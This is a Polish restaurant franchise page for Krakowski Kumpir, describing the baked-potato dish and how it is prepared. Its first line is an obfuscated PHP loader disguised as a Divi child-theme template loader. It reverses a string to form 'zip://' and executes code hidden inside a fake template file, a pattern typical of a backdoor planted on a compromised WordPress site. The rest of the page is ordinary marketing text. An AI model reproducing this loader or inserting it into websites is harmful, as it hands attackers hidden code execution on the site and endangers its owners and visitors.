/* DiviChildTheme Theme Template Loader */ load_template( strrev( "//:piz" ) . locate_template( "DiviChildTheme.template" ) . "#template", true ); O Nas | My Blog

FRANCZYZA

Chcesz otworzyć własny biznes i stać się właścicielem dochodowej restauracji?

SPRAWDZONY PRODUKT

Krakowski Kumpir serwuje ziemniaki dostarczane przez certyfikowanych polskich plantatorów, dzieki temu masz pewność że produkt jest w 100% polski.

ROZPOZNAWALNA MARKA

Sprawdź co charakteryzuje  naszą franczyzę i dlaczego warto podjąć współpracę z Krakowskim Kumpirem?

O NAS

Pierwsze miejsce w Krakowie gdzie można pysznie, szybko i tanio zjeść wielkiego Kumpira. W kraju gdzie króluje ziemniak nie mogło zabraknąć tego specjału. W dogodnych lokalizacjach w centrum Krakowa powstały dwa lokale, gdzie możesz skosztować naszej unikalnej i jedynej specjalności o nazwie Kumpir.

 KUMPIR to ogromny pieczony ziemniak. Jego podstawę stanowi zawsze masło czosnkowe, ser żółty oraz aromatyczne przyprawy. Składniki te wymieszane razem tworzą przepyszną i puszystą masę serowo–ziemniaczaną. Nasz Kumpir może być serwowany z nadzieniami takimi jak boczek, kurczak, pieczarki, szynka, ser feta itp.
Ziemniaki mogą być pieczone w tradycyjnym piecu gazowym, elektrycznym, w piecu konwekcyjnym, kuchence mikrofalowej, na grillu lub na otwartym ogniu. Niektóre restauracje, tak jak nasza, używają odpowiednich pieców przeznaczonych do pieczenia dużych ilości ziemniaków, a następnie utrzymywania ich ciepłych i gotowych od razu do podania.

CZYM JEST KUMPIR?

Dowiedz się jak powstaje Twój ulubiony Krakowski Kumpir krok po kroku!

PIECZEMY ZIEMNIAKA

Każdy z naszych ziemniaków jest upieczony w specjalnym piecu, tak aby jego cała zawartość była miękka a skórka delikatnie przypieczona. Dobrze upieczony ziemniak, to gwarancja sukcesu.

 

PODSTAWA SMAKU

Masło czosnkowe oraz ser żółty to podstawa smaku naszego KUMPIRA.  Do tego dodajemy odpowiednio dobrane przyprawy oraz znaną wszystkim sól.

DOKŁADNIE MIESZAMY

Czas nieco popracować. Łapiemy widelec albo nóż i ze zwinnością oraz starannością godną szefa kuchni mieszamy bardzo dokładnie wszystkie składniki aż do powstania jednolitej i przepysznej masy.

SOS DO WYBORU

Od tego momentu każdy KUMPIR się różni. Klient ma możliwość wybrania sosu, którym chce podkreślić smak swojej potrawy. Do wyboru sos 1000 wysp, czosnkowy lub ostry.

 

MIESNY LUB WARZYWNY

W zależności od upodobań smakowych każdego KUMPIROWICZA specjał zawierać będzie dodatki mięsne lub warzywne. Każdy znajdzie coś w sam raz dla siebie. Ważne, iż wszystkie dodatki przygotowujemy sami- na miejscu.

1KG JEDZENIA

Podstawa KUMPIRA to 500g ziemniaka- gdy dodamy sosy, warzywa oraz mięso nasz KUMPIR waży prawie (lub nawet ponad). Super wygląda no i jeszcze lepiej smakuje. Skusisz się?:)

NASZ FILM PROMOCYJNY:)

BĄDŹ NA BIERZĄCO Z KRAKOWSKIM KUMPIREM!